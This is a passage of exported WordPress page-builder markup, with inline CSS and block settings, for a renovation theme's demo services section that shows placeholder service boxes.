976px){\n\n.skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-image-content img {\n width: 111px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/floor-modification.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h4 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Gutters</h4></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis.<br>Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/floor-modification/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#333;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#333\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"567cec0e-bcfe-4c69-9c80-5643480659ef\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-567cec0e-bcfe-4c69-9c80-5643480659ef .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-567cec0e-bcfe-4c69-9c80-5643480659ef .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-567cec0e-bcfe-4c69-9c80-5643480659ef .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-567cec0e-bcfe-4c69-9c80-5643480659ef .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-567cec0e-bcfe-4c69-9c80-5643480659ef .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-567cec0e-bcfe-4c69-9c80-5643480659ef\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/remodeling/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":27,\"title\":\"services-img1\",\"filename\":\"services-img1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"598bfdc22b\",\"delete\":\"5d1b940541\",\"edit\":\"0a4d84ebf2\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=27u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":3709,\"filesizeHumanReadable\":\"4 KB\",\"context\":\"\",\"height\":65,\"width\":65,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img1.jpg\",\"height\":65,\"width\":65,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":65,\"resshowPrefix\":false,\"counterId\":\"6144aa30-a171-49e0-ba02-9fdbf6c0339a\"} -->\n<style type=\"text/css\"> .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-image-content img {\n width: 65px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img1.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\"><strong>Miscellaneous</strong></h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/remodeling/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"blockId\":\"d3c03c5f-5606-4310-98a4-30d73f9945ed\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-d3c03c5f-5606-4310-98a4-30d73f9945ed .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-d3c03c5f-5606-4310-98a4-30d73f9945ed .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-d3c03c5f-5606-4310-98a4-30d73f9945ed .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-d3c03c5f-5606-4310-98a4-30d73f9945ed .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-d3c03c5f-5606-4310-98a4-30d73f9945ed .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-d3c03c5f-5606-4310-98a4-30d73f9945ed\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/plumbing/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":30,\"title\":\"services-img4\",\"filename\":\"services-img4.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img4.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img4/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img4\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"632a5a602a\",\"delete\":\"eed2430960\",\"edit\":\"f2d09a400a\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=30u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":2845,\"filesizeHumanReadable\":\"3 KB\",\"context\":\"\",\"height\":66,\"width\":57,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img4.jpg\",\"height\":66,\"width\":57,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":57,\"resshowPrefix\":false,\"counterId\":\"bbb98fc7-3a1c-40ca-8905-157ad2df8e24\"} -->\n<style type=\"text/css\"> .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-image-content img {\n width: 57px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img4.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Insurance</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/plumbing/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"6e721bfc-c727-4b32-a621-9a1dcc0e501c\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"colorLocation1\":68,\"colorLocation2\":44,\"backgroundColor1\":\"#072d69\",\"backgroundColor2\":\"#012257\",\"backgroundType\":\"gradient\",\"className\":\"gb-renovation-section-3\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-3 skt-blocks-block-section-outer-wrap block-6e721bfc-c727-4b32-a621-9a1dcc0e501c background-type-gradient alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-image:linear-gradient(90deg, rgba(7, 45, 105, 1) 68%,rgba(1, 34, 87, 1) 44%);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"994f6e51-2a17-435a-8b2f-9235a8bb8702\"} -->\n<style type=\"text/css\"> .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-994f6e51-2a17-435a-8b2f-9235a8bb8702 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":34,\"rightPaddingTablet\":0,\"blockId\":\"2ac6f6b9-bced-48f5-9f60-eae03e300214\"} -->\n<style type=\"text/css\"> .block-2ac6f6b9-bced-48f5-9f60-eae03e300214 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-2ac6f6b9-bced-48f5-9f60-eae03e300214 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-2ac6f6b9-bced-48f5-9f60-eae03e300214 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-2ac6f6b9-bced-48f5-9f60-eae03e300214 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 0px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-2ac6f6b9-bced-48f5-9f60-eae03e300214 .skt-blocks-block-column{\n padding-top: undefinedpx; 